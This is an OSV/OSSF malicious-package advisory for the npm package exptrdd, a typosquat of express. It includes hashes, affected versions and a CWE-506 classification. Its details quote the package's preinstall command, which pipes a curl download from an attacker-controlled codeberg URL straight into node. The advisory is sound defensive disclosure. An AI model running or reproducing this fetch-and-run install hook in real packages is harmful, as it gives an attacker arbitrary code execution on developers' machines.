MAL-2026-17245

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exptrdd/MAL-2026-17245.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17245
Published
2026-09-29T14:39:22Z
Modified
2026-09-29T15:00:05Z
Summary
Malicious code in exptrdd (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314)

package.json declares a preinstall lifecycle that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching an unpinned script from a mutable branch and piping it directly into node on every npm install. The fetched code runs with the installer's privileges and can perform arbitrary actions on the host. The package identity is a typosquat of express: name is exptrdd while the description, keywords, author, and repository fields are copied verbatim from expressjs/express, so developers who mistype express install the dropper. The remote source (codeberg branch, proxied through web.archive.org) is attacker-controlled and mutable, so the executed payload can change at any time without a package republish.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020626",
            "import_time":  "2026-09-29T14:44:37.152333146Z",
            "modified_time":  "2026-09-29T14:39:22Z",
            "sha256":  "6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314",
            "source":  "amazon-inspector",
            "versions":  [
                "5.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / exptrdd

Package

Affected ranges

Affected versions

5.*
5.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "35c27145148e489ab8fcc6ff09201ee8806a01b26dc2313199ccea49b8d9c400",
            "tlsh":  "3e51da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e56f71b9fbf"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "exptrdd-5.2.1.tgz",
            "hashes":  {
                "sha1":  "fc58a91ed7c5a2fb45ff4576cfd90c9e2340ba94",
                "sha512_sri":  "sha512-mheJ2q9ybO70PBK3n/0QC/Bg4DEi13mtUvkDtqqD0rjL6ILm4jxtv0W7rVi+/hYtc5AVBZFm3LKNeW0TBQuoRQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/exptrdd/MAL-2026-17245.json"